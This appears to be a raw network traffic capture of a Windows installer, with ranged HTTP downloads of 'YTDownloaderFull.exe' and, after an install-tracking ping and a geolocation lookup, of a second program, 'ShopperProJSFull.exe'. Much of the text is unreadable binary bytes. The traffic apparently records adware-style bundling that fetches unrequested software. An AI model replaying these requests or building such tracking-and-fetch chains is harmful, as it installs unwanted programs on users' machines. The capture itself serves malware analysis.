... .D.*$..K,.H....j........qV._`.K.[...<..\.1......o..N1r.....C.J.
.v...^...U.m....xH}........K....}.LY.HT.;x......a2..M.^.&...N...C.8...
.u.jM...1Mq....6Kv'.W....P..L9....x........3..B1.S....,..o.zE..=t'Y@..
K..2....v......>...o..]...1.}r..3..L.WZ..>.j...\!.....s...=7.Y.r
.....D".|.G...V...:..r.......kF....`8..|...m........I>.~t..4.3.....
..'.c...e%..'..%.4.M....e. .........Y.....,i.\#..S...H....... .PB.<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=4000000-4249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: ewp96u3qp-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:46 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: ExSr6Ia2g86hRIsPePsrxtD sSvPq2BScWHkw2/qXiTO0VdprOgC2VRg8wHgFAoG

x-amz-request-id: 53CC7C4B9F296CF1

Last-Modified: Thu, 18 Jun 2015 10:00:13 GMT

ETag: "898ada50d75f82eed316dff5a1e4bd88"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 4000000-4249999/7202358
[......I......Q.8h...;....y........'..h..r.....B....@{C<.".O.M....x
E.....a<.....3.........S..R%p"...d<\P....VJ.A..x.......ZN.\.wx2.
j...e)..}^(./....P..X.m.x...{xo../-.y..k.........|..a/..../A."-...t|..
...^..f.d..L..9t..R.@..~a.2-gJ.M...xx.K.~....ZuqR8....r.}{G9.=....._..
...2....E.....6............4..,.c.....{*.B{.kKP..V../k.s..j...Job...KV
jK...O..=.}..... ..<S./V....q.op.U._..r}...2...&.....%C.UBR!.8.3...
-w.W.....t#.v.........n.q...(.I.n..fT ..^t....../.H....G.j.....'y\....
... _.R.z....%...(t.2......0.~#(...E.PIy...~.....:Y.^..#.>Oh.^z....
7y.#.............. ......~L.3~...y.ri..[....J...d..)_...z...........s.
..<..........Ohx...1.o...........j...].8....m.7..|.2....)1.........
k1.....!L.....4"..X...5....J.5_..M-.|^.<I.R..?.FR..o%......|"p.2}.D
.Rc..%.4..dM..'..KZ.Q.i..q.l.s...I" [email protected]..
....1%z.1.W.....#...vq..q...........w7.........Y...%..T....a..1......s
!h.M.Zi0.._..)....{....Ev4ht._.....l".~..cO....}._.......(..F.P ..J..a
....|..,l...P..1-e5....H.....z.....h...y.....E.e..a..?=tGAR.*&....5...
....Z..6*..w..5%.{n..m.-..B............^r....2....%...!I...:..G. /..s,
....8..^*.;.".:..u....q....e/.......pF].e%G..K'..J..u.y..Y`....:.V....
?........Z.h.....:......$.V...2..).b.K_.....h'...}3..)...ORS.e...Z.h..
`.....X.[yIyt[.........h.rJ....m.i3..?L....X...S.$?."..:Ys.....!).....
=......qTj.C....Y..x.R_..1&..6-`....5T...<wN.kO.].4...f..m.6d..t.--
.....2^........P.].7..h.u..Lm..6.\...*.oTp.j9.{/.6.......3....J...o'C.
>J...cI......E..k..I.:[email protected].`.e^.}Y..I>....W.........,.:.&l<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=4250000-4499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: ewp96u3qp-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:46 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: ExSr6Ia2g86hRIsPePsrxtD sSvPq2BScWHkw2/qXiTO0VdprOgC2VRg8wHgFAoG

x-amz-request-id: 53CC7C4B9F296CF1

Last-Modified: Thu, 18 Jun 2015 10:00:13 GMT

ETag: "898ada50d75f82eed316dff5a1e4bd88"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 4250000-4499999/7202358
..........l.R..Ge.M..$....Nb...j8.6T......._..o.f.......a.......N"..h"
........YK~..Uh...g...&D.;<q..f......F.P..F.XF...q....dB..........4
![>!.....;.....{.09...0.c.."[email protected]..\^.....PpDA..
....-.s=qi"b......d......z)m9'N..:..Y.G. ..>7..$.;.U.......m..#B...
..B;k.n....Q.....-....'..UzB.....[.L....h..XCN.....'%R..........t..9".
"U..]L`..........a..z.G.nI........D../..m.oJ...[.V....../.....v.......
.....My...........(..k..qaF!g..R.71.g...;....o..):.{:\....<.Y....N.
.U........2..=i...S..&b.k:)...*D........j.t$.#...$.......r.b..:..)N...
?u0........St.x.'.."=.( ....cR....;...[...g...... ..q..G..........]...
..F.nL$q..z....~|.!.....SOo...s\F.......eN.D#8..m.....,..`L.3,..}x..Ky
....k~.d.o.....K..m.'n.s..cgQ... .(...yH.%.U.p.].IO&....BZ.if...P.....
.....i..b_Y^...:B..B{.J3.I.)45...,....r.|...o..9'.d....F.4h.*..v.K.P..
.V/~o(..........*H.,..%y..z..Dv...?..o....Z.;..d...>......J4u......
 f..".d........u.gv,%......$u........U._E8.Q.-R.rA..Qj;N.*..C$.....F.5
^....,.T....uIT_4\... ES).......T\....r.|.g./.A.p.E...<..bFG3L....&
gt;...^.h.V.....^= 3'..!..W.0..1?'[email protected](..C......N..j`....*
2.[... ....}...x..s..f....k.@TB $-.0@..`.s....u...8......n.uIhe.v.|...
I.>z......liN}.......V..y?....5]I.........P]R3]vW=6............Y...
..z...a:.....k$.....cC.B... .......y......u. .\...&V5..j6.........>
....1......Y:`...............E.h]:....~%R...i.....]...........I...x...
..D..........![Q@..../D..h.!.N/)...^..........5E...V..........Z..T..u5
..~.<.J$....a..Qm..'G.O..59.......B4r..S..G.nR~.......2...^....<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=4750000-4999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: ewp96u3qp-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:46 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: ExSr6Ia2g86hRIsPePsrxtD sSvPq2BScWHkw2/qXiTO0VdprOgC2VRg8wHgFAoG

x-amz-request-id: 53CC7C4B9F296CF1

Last-Modified: Thu, 18 Jun 2015 10:00:13 GMT

ETag: "898ada50d75f82eed316dff5a1e4bd88"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 4750000-4999999/7202358
...U...l......mN.z..N .b.aD. .L0....9......c...4E{./..a....AD.......yk
.._Y'i.=..yr..I%..E.~n=w<Z0[vF...J.^........5.Za.I.....^.m.?f..r_.1
....1<....96$....$(.}[email protected].
...#..9q.z.......ZC....?...K/.B....e....N.K.......NjR..3..g..s.lICC.IL
^......<*DQ.....Y...M...d..3..`....>.mD..#..C..s<.....7R.....
..qB.7.Ek.....h..._P.(.......G|.:........2.....Nc....XU....r..B.$P....
[email protected],/..).7 n.......n&..T:..h.j..<.m..
....io.!...O.I.|.<.........A...U..T..u.G...~..H.ri....;.pF.o.......
......_?`~...0.E.^.qDi...rf?.....N..c.D....^Rz.<.../;[email protected](.....]*
...o.......p.......]a...L.-.........k.O.j....Dz-T.{...m.~....3.T.....k
..VI...&I./.-L=..qeOWHk. .E./...^.9v.&..G.z...0K.Gr7.>.....}......C
k..C ..-..f$....$..:......2....5...........3.....~(cm?..(...A..Z.....|
.W.....Dzw..]}.h.3o.. )n#.NZ'.....J)7Z...d..'..${Wj..x.K......#R...3.4
cU,)...H..._B`i.$.......4m.$...L.s.j.&o.Z..G\....3.S....Uhq.|.T.,1..X|
....I....d...I.tO...p9h.....Q.pO5S"Z......gg3....5S...?K...%.:.E3....*
d..;.P..l~K.yf.........5. ...(..1..5..k...tb.=...D..'...._.......Y..iA
.).%..w.Yf.!...^..&./}..V|.1..%.Y.Z)...h...........C.....p..l.r.Q..^..
ak.r...1Z.).;."..L... ..]..5......l.Oj..."5.$..,......\....!....TK_c..
....Sk..5..f.I.E.F cK\.p....>.$...l./.{&...................C..9...t
.......tx>8..-...g.....o.3...,.I1=.W.,.-....&.|..~.(.Y.9..sf.."6...
.Vv7.P.........&. .m.......i.....Ep.....r.n,.....A)....7..>........
.w...e...mH.j.-..8.s,o......}NM.M...YF.#w..T"?.Z.GKH.a..{dy....x..<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=5500000-5749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: ewp96u3qp-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:46 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: ExSr6Ia2g86hRIsPePsrxtD sSvPq2BScWHkw2/qXiTO0VdprOgC2VRg8wHgFAoG

x-amz-request-id: 53CC7C4B9F296CF1

Last-Modified: Thu, 18 Jun 2015 10:00:13 GMT

ETag: "898ada50d75f82eed316dff5a1e4bd88"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 5500000-5749999/7202358
.d.........&.....n...h..!...j..w.|-@;...=.>.....f.1].......9..)*"@.
B...\.-...x.G......7...7..i........K.^........L.z... -7...KE:.~(#.J..%
'..~.N.g....h........x@-..@!.._j..6..GC....P..GB.l....~Y.s,Ri\..8.....
.4 ..B.%;j?rQ......;.:.oY....f..LN..5#S..............[.....>.......
.;$_..(..O.......J@<Nc.T.........K.#.#<..'.Kn$.}.........EC.@...
..[...?.q....:...<....i.g..!....1s.]...._.e.GNX.Z...\x..q....t.....
I....C.o.[.*..V...U..9.`{..}....3$ZD..*......>U....Y......lQ.K..a..
.6.5)7...3.Y....6 ....a<5'..h:.;.... E!.<.....lj...a.V.y .....C.
P.....BK.Q2.1....j..sA.U...c. .~..R....._.W.....Uy....1..7wEy....h....
[email protected]#.Z...W.y.P..c....).z...D.|\.3I.....[R..[=..?G ..A.@
...,NdQ....,...Sm......NS..T....,L..Q....G$b...h. ./$.....Br.....}|>
;..H.jMk.g.;.:rW....='E...iI....W...R.U.F....r&..c..u..c.7pK.R.=."G...
......dN.p.%.r-l..&t.....Ui..)......TP..;b..I*...W..s .Q=..j>.E.T.2
.W..J.qA.V:.!...b.N..%.;.C&...W.._.s.tKa*n....zq.{...[..........q1..~e
..)..g..r._t.wv..5... ...tMEku).KH.j."...7.TLaT....7....>i....@...@
....Z..3u... ...R.B.p$...Z.:...w<2.e...)....f....;..n.*.n..`j... ..
..y..vs*...V ........3..H.~.7w...kY....9.....Oef$..n.....^z....o..W...
g....[....;..|.9..s<2..;h0.g".A".|.DlUf.k"...:.a.. ......=...L-..L.
v..(......J..6.~KDD.,Y.%....^3-_....0.'7.....|......o.qZv.....Cm.2..~.
..1..9..=..p....%!...Pr.(E..N...G*z.......fi.$..A......9...~.S....es..
.e.....>..^.J..ad...2`V.n.A.?..G..{d.g.s.(b.:u.!.;<. ./.g....;?.
t.g.........#i......).x...T..$.q..'..q.....c[....s...E...'g....q..<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=5750000-5999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: ewp96u3qp-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:47 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: ExSr6Ia2g86hRIsPePsrxtD sSvPq2BScWHkw2/qXiTO0VdprOgC2VRg8wHgFAoG

x-amz-request-id: 53CC7C4B9F296CF1

Last-Modified: Thu, 18 Jun 2015 10:00:13 GMT

ETag: "898ada50d75f82eed316dff5a1e4bd88"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 5750000-5999999/7202358
.O8.H.....)Wl. .u...$....n0B..p.[.k.~.I.F-......#9n.N5.......gI..L.CI=
..?;...8.g..W.`....F1....d.. 0..@...*.~}eK.K_...|..a9..$...}5..uHztN..
...h)...J...{c......O.0fV..WJ.=.f..Q8....7...rI.RD....},K.u..]M....!..
t].tF]V..Q..................ON.}....f05(.\....<b>}]NYW...&..k:.a
.....e.Y.'...N...2..E.P2:.........FB...4..bH`.k.........3(|.m.OQ$AM0..
...&.C..Z7...5...J.YV.*..f.a.y[.^.=.6..b.,.xM.....2..(...?r.!..>.y.
..W....h.L.=...,...3k.....=..?].....#a[xc.xQ.)..S.`XAo..U;.{.,CH.....x
.R.GN tv. ..C.....7...:d^...cXg..U.T.[Z..|,.2..HF....,....0...."....\.
.....b.K..\...^'l..c.Y.U6.R..}.p^"/,...zqm.........L....7.i.Q...5....m
k.LTy...cj..7hp.._..~I..,Q.=..(..J.46?.;.4O...n.y....1..K.....u.......
.}Q.......).#b..rJ.u....".L. t.F..C.....D.x\...<rQ.;.8..6.jT.{v<
$.d..}.u..V.....J*5^..#.J.!K.k.aE.Q....qw'...r.;\.:Q......U.&....O.D.R
....)....n.*&.F....Q.,.%....4.T.dD...............#.w.1.J...d^..:lYh..s
[r.I-.q.........s....Rs.27k......6.....^HW.%q,g..:...M........KI..8.3.
.....h...R.....D:..V.....H...VEE.B........G.....E./9...:7.'....GOCz...
{M..t...3..N.o]\4.gfU..&...7;0.....F...P&0."S1..'...>....0UN.D..2.Z
.&O...bDs."..ah.c...;../9.E.S..G.N....K5....o.?w.....HG. .i.Y.T.#R....
U...G.WW.}5.....p)F..I....5........Gd1...LC...A......i.m/}........7..d
j;..#/..E.SM...-...>......_.".....Gs.H...f.m./.....|z......7.......
.......n.".T'$e...J................F....%4.n}^KT)!6..>H.T.A...L...:
%y.....6.*...k.......v?.....~......J.....h..A..`9(S....$....5..y....eM
F......)r.6j......?9.P.....FS..F..M.VF...........x.zx-.P.B.g;....R<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=6250000-6499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: ewp96u3qp-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:47 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: ExSr6Ia2g86hRIsPePsrxtD sSvPq2BScWHkw2/qXiTO0VdprOgC2VRg8wHgFAoG

x-amz-request-id: 53CC7C4B9F296CF1

Last-Modified: Thu, 18 Jun 2015 10:00:13 GMT

ETag: "898ada50d75f82eed316dff5a1e4bd88"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 6250000-6499999/7202358
.'&..H...FTL)a.K.S........|.Y..@.^. .R.u........]......*.N.R"....>6
.2a9..q.r/.H...._....(!.....{...hS9............X...q......I).....W..I^
\..7:n..e@_...x;zO<o..Pm`u..j....`d...0r....81..........e>[email protected]
.|.p....Tk.ko..-~.?.F..K"......ya.7.9......;.....Z"rC..,..........~...
G.9....e.......l.Dx......3..F...............G..B.Vm.(..f....'...4X.y.&
gt;F. ......L.]..C.xk.(^.:........-y.....7.n....Z..n.W.w.-.,..>..=o
...>.....^|.Fzs..M.....,..^Z.^....>..].J&.9S.. ..e.....J.m.k....
.....2..t..H.d.........a....cl<1-..s........^.1d.,B.=.Rc....N, ....
......L...K..Wd.=..U.......(.'}.....6..3.C...7.cU.....IAj(.........._.
Y_.....|I.O.]....{~R.a|$......3..U7... .?"......UY........fXV~".0..~}?
. ...........].q.m..J..z.....\.1......A...g]k;.4....~<././...W.T...
.....K].'.......4..Guo...76..MA..1..........J...=0|.."...;<../.~.4.
..).<..;....F\...=..){_#1.....;O).#C..Ao.."..sGc......k.....H...|.k
>..t...F.(XD....zS......Z..R.. .......f.....q....0.......'.H......0
.25.;fX.~R........y5..\.x7x..|[email protected].....<..
.lNs.H..H.S.... .5...:(..c..1:.w.....C...M........&1Kp...p._b..9.,.. .
...n....w.#k.]..M.0R.mY........7....Gz.6.a.;.#..U.....2..cHFXn.?. Ou..
.=.....E.._..<..u$...../...r..a..[Z.z....."...zL.i..Bx.F...._-....=
.t..2..hA .9..........2*..w...K....(...b.F>h.....{.1..d.]B ._".....
.Dcj%<......([email protected]=.(^....Z.!.%........X...... C....`=
.........\.V....CjK.z..D...,..?s7..D..R.gb.?.....H...}......]d8a._B..Y
..BB..et.GT.........'<)W.......8..o...'._O..Wk-;"..$.......& .x<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=7000000-7202357

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: ewp96u3qp-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:47 GMT

Content-Type: application/octet-stream

Content-Length: 202358

Connection: keep-alive

x-amz-id-2: ExSr6Ia2g86hRIsPePsrxtD sSvPq2BScWHkw2/qXiTO0VdprOgC2VRg8wHgFAoG

x-amz-request-id: 53CC7C4B9F296CF1

Last-Modified: Thu, 18 Jun 2015 10:00:13 GMT

ETag: "898ada50d75f82eed316dff5a1e4bd88"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 7000000-7202357/7202358
e...pO/.<.eM..m.........B.\.y.u.T...../........##C.............m8..
..5L..1......'...a..../-....Z$3....f...p~AHe.0..2...........!..N...].Y
[email protected]...~...&$...v..._......k.._...U..'
.1a.V..U.=Y.i....)[email protected],.*;X..?M..
`......7...5S...........S........j..-..p}....nPB....Zwa.iI..".....d)..
.5N;.L.......y....:..THLl. ..uv;.. .~.e.YD\@.t...b.I..T........U..."..
$X....u....^.%..MZ.Q.......].2sNh..>.`^..........?><z:....5B.
.....g}.(...,o. .[uKK....L.......q_.K.s&..d2.6.gb.......~.b.o......`.k
.l.SI.......z...UTQ.k..m...UJ..Eh..(.....e...N.z...).....odrox..`..9.:
<...z....o..5....0./.....x.........ER}..0B.h.....rO .qR..`G....yV.q
.=.....*.*....x#......}xn.wUo...........g.3.5......^s;'.f1...u..L..2g.
..<FD./(.(~......b....w..H......."..l.. $....2h...'..j.sIshX....5.L
9z.wE.uIZ......#y....R..`....g...aq.3....pL.G`..0#.(.lE.._.7..$....(.,
M".....*&.fI6....g..H0.=.;..k...i.......%.$..{...H...3/..2..j.J.Q...(W
9.\B}...yg..#...n..Vr.....?z.K..;.>7...7Fs0......9.....h....d.....u
1/.\...t..6......T ....D.m..H....@>.=.o.._&....2.Gp}....(tUM.Y^....
Eg....y6....k....L.`K....O.m%.. 2.\...5x^. ..u,lb.m.S0.U0..{e.......l.
^......x)Oo.r.Z..Ap.fv?.d,.n....^hJ..E$..\......r...D................g
S?..b....F.{9>t./.!...v...M.....K.}..w.].d.Qs.0.1uM.~b 0.B....3d.u~
.5S`.........d.l..w.6.... ......7..i...9&..).<E...DrH...P..(4 H.<
;....'.z.&..{.R .vV.5...t.....g.E...=....rbF..VF.)...uz}[email protected]...
.3.'D.....H|[email protected]..!..T..R.d......t......LF.G.<<< skipped >>>

GET /app/ping.ashx?action=S_INSTALL&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-4bd6-97ff-f15d28801c02,&rnd=21405&v=1.0.8654.1137&url=&title=&pingtext=Files& protocol=&size=0&ref=&browser= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: VVV.ytdownloader.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 0

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Fri, 19 Jun 2015 06:16:51 GMT

HTTP/1.1 200 OK..Cache-Control: private..Content-Length: 0..Server: Mi
crosoft-IIS/7.5..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..D
ate: Fri, 19 Jun 2015 06:16:51 GMT..

GET / HTTP/1.1

Host: ipgeoapi.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Fri, 19 Jun 2015 06:17:05 GMT

Connection: keep-alive

Content-Type: application/json;charset=utf-8

Content-Length: 40

Server: thin 1.4.1 codename Chromeo

Via: 1.1 vegur

{"country_code":222,"country_name":"UA"}HTTP/1.1 200 OK..Date: Fri, 19
 Jun 2015 06:17:05 GMT..Connection: keep-alive..Content-Type: applicat
ion/json;charset=utf-8..Content-Length: 40..Server: thin 1.4.1 codenam
e Chromeo..Via: 1.1 vegur..{"country_code":222,"country_name":"UA"}..

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=250000-499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Date: Fri, 19 Jun 2015 05:32:30 GMT

Last-Modified: Fri, 19 Jun 2015 05:19:58 GMT

ETag: "4725e0005d5764ca825a7394d1d4a9aa"

Accept-Ranges: bytes

Server: AmazonS3

Content-Range: bytes 250000-499999/2684416

Age: 2649

X-Cache: Hit from cloudfront

Via: 1.1 d49ed3edd173b406741cc9c27a726287.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 1uLhWeLVs0jh7xZnSiRG1yZJosx9nhOMsSo0sT9uGdfgjPpuhNf-5w==
!|#@..-.4J..!j9^.....a~!QEL../.....gm._^.v...1.pj.....Z/....q,hp....oq
 .cqo.k..q.. .6.X...x..!..)....X....v.`,.2...z.i1-...N.<o...9M....:
....m..d..a>..]....c.h..Y.K......e...Jf?f=...Ig.K....H."7..rk...g..
..c.g.......gZ..4..K..\,....k.....?I.L..9!.B...N..1w..........K...W^..
..!.=uH)g...c7.......0Z.......|}...~1.OW.D`o.8f..7..}*. .U.s..ui?Yv...
.l .|.}.G.e].3.T.....Sj..K...."[email protected]$[...Oa.....l...Z..&..*.r.]..
.33....2..tn.......\[.I.I5....F<*.-<*1.......H......,.D&g.U..0.?
..[..H.uvu.d[...g65....\.....RR...w\Ide....O.....p...}....;b...}... ..
.a..`*K(C0xJ:.$..O...Ue.C?.")....P7....2gfp..F.......vMx..>.\..v.'y
G4.._....R..K{N...._...;.Pv4......c.T]T..1.^x8H..}!.~a.......DO.l>i
..*R...Gmi. @$.......]..~.........mm..!5._p......m....L.rDH9.jw..#.u..
|.0..Z...Y.w*.8X2.y....O......t.o...A..(....gU...[UQ....}H......../l..
[..?.H...:X..-MN.%......C..f0.^....75I....g....TN.FWXx.s.,=.E.`....b&5
.H..y..X..>...|....kH...$.................zX..........h.K.b....s.P.
.Q.1.<.27..ww..iW......'SNZ........K.v...EhD.:......C....'..nh.N...
3...F_.9}.*.......y..q..cX.^`.k!#..!(..IO..sU...0....Sc[yH...ip].36...
..rx!oJ. ..Z.z4.Z..-...&O ...N9!.......7..;..9..T...RR......aS.7.ND...
.........=.....xB._%!.....8~..A.kL......(........&.....#..{........!..
........)...z[{...d....^.......2\[email protected].:..
Y.....S...).J..6...V.>..<;...b._....5....nTM<[email protected]..{....E..
.-7.M.9.:........f..d...>;.Y..ig..,G2.~q....@!>[email protected]..^.MQ...l
..-`..|BI..J........,.M5.'9Y..........JR.;...P..]TSA.......KdcSd..<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=1250000-1499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive



..9X.^.....#r1........mN..M......I..(|.]%....q.....w.V.Zq..V....d....J
$...*..=....1]..b.4......sF.&Q....Ku..l...gl..._...x;.l.Ut.t%;........
.}..V.N.s..>...%X.F.......b..............OO.t.'..4.3S...........'..
........"..xv....j.MH.E.hu..)... s...6x.D.c."....sl....SQJ}...../.X;.G
.I5... .....R.mG-K.o......V.vo.h. . .....m... .Wh;../..............5^.
.7`....i.....Wf....?.`.X......Q..[....k..J.H....`.z(..1....!....qIf.*.
F..>.ZN.[.."..9rq........=.<...O.Xj@ek.# u.$...*4.. .x..y["..u.p
N28WBF...... ...L..`....X..c.W.!.w.....`....;.$..%.,..\......z.....=tM
m...1"...G9...x...3.A.C.....9..=..o2....2.....>.C-%[email protected]"
.s9y.c%VA.{...#..7$.=.q..4t.n.....c.$.T...)?)[email protected]..#
si.o.8k ................0'J..)..C.....J... s..x..x.....Dp.m..]w"...u..
r.!..b.).2F..&G.3..M....y<.[.1.dS.....H...%QR..:..).....N*[email protected]
j .........#.6G....../xg.'......"...T).3.....L..._..>N..' |.[.....o
..K.H.y....D...%.1b. .Z..|A(..c....:*.2L.....Y...8....1.^ZNj..)tf.ilj.
....,............y..^..#........n.V.Q&?fq%.....i.O....1.w.P?....i..0..
.O..............u>"x"S-.}R$j.l.._. ..-........xM..../-.o.z.HS.....l
#.....E?.M."...H...n!...7.5...Q.........N....e-a....X...Z....Zyz...4..
.ig.x....I.'sO.ZAx#r.x......{S{[email protected]*(.8v...*q.b..
2g(.x.......\RU4..N.........<.2.E.....y3..".-.d.2_v...",[email protected].
.....M...[.G.NPs..J.P1...QH$.6.x.t..-T..Zm.Z....5f.[........l.n.....=.
.........0.g .&C.!........s. ..c-;vC`...LS..L....E.....#.,.....S,.bq.n
.%Ei..q. V r.....Zf......IS_.0\q........9...a).r...|.:p.9..U..&...<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=1750000-1999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Date: Fri, 19 Jun 2015 05:32:30 GMT

Last-Modified: Fri, 19 Jun 2015 05:19:58 GMT

ETag: "4725e0005d5764ca825a7394d1d4a9aa"

Accept-Ranges: bytes

Server: AmazonS3

Content-Range: bytes 1750000-1999999/2684416

Age: 2650

X-Cache: Hit from cloudfront

Via: 1.1 d49ed3edd173b406741cc9c27a726287.cloudfront.net (CloudFront)

X-Amz-Cf-Id: EJLODhtPU8qCDCalZAICOntxnehltpMy3I2WBHeooj3rpNPKck66kQ==
.(....I...v..6...k.....a..v4./.Q......AS.g....=.1..H.. ..f..a......%f.
..)..\.,.....Yu7.Q#.3.....E(K_.D^L...X.6..$....9"[email protected]`./U.
...%X?.' ......1..=5..pd....A....`....CHa..N.'.L......EOb..,$.uxZ]k.?.
!R$a...\.VW.G..........4....u.7.Y..~.`g...vZng.u.l..v......0jW.o..V#.&
gt;....p.^..........L..v.C....J.*a..y....y.Sv..p.C.n.q....c`...M/..v%S
.. &.t..x....c.......]$M7X.....;.l.......}#>[email protected].....[
?....|...7..A6.....?.......J.h......}"'|y.n......M.\....-..:D.d.....S.
.a .Qd&5.K....JT.n..@.....[jav"f..R.ht.. ._=.....^.a:...d..q...7og_w.*
FB....g.~.T...G.K..g5p..Z3.Dz..xd;...~u*..N.Z..$.m....a b...M..N..|o..
$.F....`....X<@..h..\Qmp.....^.6N. ..^.j.........[....L......>\.
.r....N..f..a.z...6....k.I...h..;"[email protected]....._...4..
..vD.e...[.N...#(.....J.V...}K.L...%..,0..U...S..yo...;G..q.......k...
.Q..Y..(..8F{...}..2a"[email protected]. ....G....zh.6.k3hXa...e#0.LT..s9?O......K
X..Q...............S.Z.. v.(. .L.M.. .....2...X..m]g.z^C.mD.v........_
.....")..'.s...V;&r.(?"...B..c_.F....g?.^|w..~.....6M....r..@...]x9.f.
.....$.4........2...._@'......iZ..J[../.2.U....^m%H.K..{.i...(.1...ESD
.JU.T...JCy.9.'_.iv.Y%....Y...jJM........]m..[...=..:.4.].*..N.="..|..
 .M/.P^....R.......y.('TX..F..E.1..h.ml]..0i.U.84..........o.(......%.
N...G2o..V.hY.Z.....n..M..{e.e..i...i.*.AD.TUD$..f.%D.....s.1......q..
U{..9.D."b.Vv..Wi.(....w...N.^../...Im......!..;..D0.mC..R..m'_..k..ky
....r.5U{1(..p;V...`....N.^*.t8>O|.#....S.^...7..=.'t#...Z.........
....._. .?}...d.(..?......).F.M...J.$.rQT.k...~<.. -oD]v2.....0<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1

Range: bytes=2250000-2499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d2bt1dcmxj05l2.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Date: Fri, 19 Jun 2015 05:32:30 GMT

Last-Modified: Fri, 19 Jun 2015 05:19:58 GMT

ETag: "4725e0005d5764ca825a7394d1d4a9aa"

Accept-Ranges: bytes

Server: AmazonS3

Content-Range: bytes 2250000-2499999/2684416

Age: 2650

X-Cache: Hit from cloudfront

Via: 1.1 d49ed3edd173b406741cc9c27a726287.cloudfront.net (CloudFront)

X-Amz-Cf-Id: eqaUgjZWYGH95NelqX3Fqr8eGaOloT2hyjzOCttr71kS7a2oBYNGDQ==
1^.it/.n...........up....|"4..Rdmp......N..sZ....lW.!C.....3.&....4.q.
z....q.#...;9.6.Tk...a...TM.1H, [email protected]..=w...:..v...J%.
[email protected].?..__2).....C.S.. 6R.
.U.H7.t..S6.....t....a$w..<C..i*..@>..'.].[7..j./N..3.O;*....EY.
...WH.].}....;H4..b...,..........u.?..Du.:........`..1........v5......
OzG...a'_.)...tY....$....#..H'..%.WY.#...v.&O.K.a9...]2a.y...B......`.
.....Ty.}l.............IIk..4(.c..........'..>. ..<Ge.......,...
